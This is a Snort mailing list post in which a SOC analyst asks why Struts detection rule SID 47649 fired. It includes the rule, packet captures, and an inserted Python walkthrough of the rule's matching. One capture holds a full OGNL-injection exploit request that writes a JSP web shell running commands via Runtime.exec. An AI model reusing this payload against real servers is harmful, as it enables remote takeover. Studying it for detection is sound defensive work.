Snort mailing list archives

Understanding SNORT ID 47649


From: Migell Roberts <migell.roberts () gdt com>
Date: Mon, 1 Apr 2019 17:52:19 +0000

I've been looking in the snort manual for an explanation on SID 47649 below and unfortunately, I can't find what I need:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
    msg:"SERVER-WEBAPP Apache Struts remote code execution attempt";
    flow:to_server;
    content:"|23|_memberAccess";
    fast_pattern:only;
    http_uri:;
    content:"ognl.";
    http_uri:;
    pcre:"/ognl\x2e(OgnlContext|ClassResolver|TypeConverter|MemberAccess)/Ui";
    metadata:policy balanced-ips drop, policy max-detect-ips drop, policy security-ips drop, service http;
    reference:cve,2018-11776;
    reference:url,cwiki.apache.org/confluence/display/WW/S2-057;
    classtype:attempted-user;
    sid:47649;
    rev:1;
    gid:1;
)

We have Cisco Firepower and the above SID triggered. I'd like to know how the above SID triggered (I have some assumptions, but didn't want to assume).


To paint more of a picture, below is the text captured from packet captures related to the event I found:

[non-printable packet header bytes omitted] ut.print%28%22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://www.pba.com/
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html£©
Client-IP: 10.10.10.1
Cookie: akaas_PBAdotComAudienceSegmentation=2147483647~rv=26~id=396fe2c7446d729001164ba005e14de4~rn=
True-Client-IP: 120.7.79.15
X-Akamai-CONFIG-LOG-DETAIL: true
TE:  chunked;q=1.0
Connection: TE
Accept-Encoding: gzip
Akamai-Origin-Hop: 2
Via: 1.1 v1-akamaitech.net(ghost) (AkamaiGHost), 1.1 akamai.net(ghost) (AkamaiGHost)
X-Forwarded-For: 10.10.10.1, 120.7.79.15, 150.142.22.3
Host: www.pba.com
Cache-Control: max-age=86400
Connection: keep-alive

AND

[non-printable packet header bytes omitted] GET /struts2-showcase/filedownload/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew%20java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%20%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%29.exec%28request.getParameter%28%22l%22%29%29.getInputStream%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3Cpre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20o


Regards,



Migell E. Roberts  |  SOC Analyst


214.873.9250 office
migell.roberts () gdt com


gdt.com<https://www.gdt.com/> | 999 Metromedia Place, Dallas, TX 75247
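To see why the rule fires on that request, here is an added example (not from the post or from the Snort project) that walks the rule's three URI checks over a constructed, truncated copy of the captured request line. It approximates Snort's http_uri normalisation with a single percent-decoding pass, which is why the `|23|` byte in the rule matches the `%23` seen on the wire; the flow and port conditions are assumed satisfied.

```python
import re
from urllib.parse import unquote

# Options taken from the SID 47649 rule quoted in the post. Both content
# matches and the pcre (U flag) are evaluated against Snort's http_uri
# buffer, i.e. the URI after http_inspect normalisation, not raw bytes.
FAST_PATTERN = b"\x23_memberAccess"   # content:"|23|_memberAccess"; http_uri
SECOND_CONTENT = b"ognl."              # content:"ognl."; http_uri
PCRE = re.compile(                     # pcre:"/ognl\x2e(...)/Ui"  (i = nocase)
    rb"ognl\x2e(OgnlContext|ClassResolver|TypeConverter|MemberAccess)",
    re.IGNORECASE)


def normalize_uri(raw_uri: bytes) -> bytes:
    """Approximation of the http_uri buffer: one percent-decoding pass."""
    return unquote(raw_uri.decode("latin-1"), encoding="latin-1").encode("latin-1")


def evaluate_sid_47649(request_line: bytes) -> dict:
    """Walk the rule's URI checks in order and report which ones fired."""
    parts = request_line.split(b" ")
    raw_uri = parts[1] if len(parts) >= 2 else b""
    uri = normalize_uri(raw_uri)
    checks = {
        # The wire bytes carry "%23", so the fast pattern is absent there...
        "raw_uri_has_fast_pattern": FAST_PATTERN in raw_uri,
        # ...but present once the URI is normalised, which is what Snort inspects.
        "fast_pattern": FAST_PATTERN in uri,
        "ognl": SECOND_CONTENT in uri,
        "pcre": PCRE.search(uri) is not None,
    }
    checks["alert"] = checks["fast_pattern"] and checks["ognl"] and checks["pcre"]
    return checks


# Constructed, truncated copy of the captured request line: only the leading
# OGNL tokens the rule keys on are kept.
CAPTURED_LINE = (b"GET /struts2-showcase/filedownload/index.action?"
                 b"method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,"
                 b"%23a%3d%23parameters.reqobj[0] HTTP/1.1")
# Constructed benign request to the same action, for contrast.
BENIGN_LINE = b"GET /struts2-showcase/filedownload/index.action?method:download HTTP/1.1"

if __name__ == "__main__":
    for line in (CAPTURED_LINE, BENIGN_LINE):
        print(line[:48], evaluate_sid_47649(line))
```

Real Snort normalisation also handles path traversal, double encoding and similar cases, so treat this as an explanation of the match order rather than a drop-in reimplementation.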

_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists snort org
https://lists.snort.org/mailman/listinfo/snort-sigs

Please visit http://blog.snort.org for the latest news about Snort!

Please follow these rules: https://snort.org/faq/what-is-the-mailing-list-etiquette

Visit Snort.org to subscribe to the official Snort ruleset, and make sure to stay up to date to catch the most emerging threats: https://snort.org/downloads/#rule-downloads
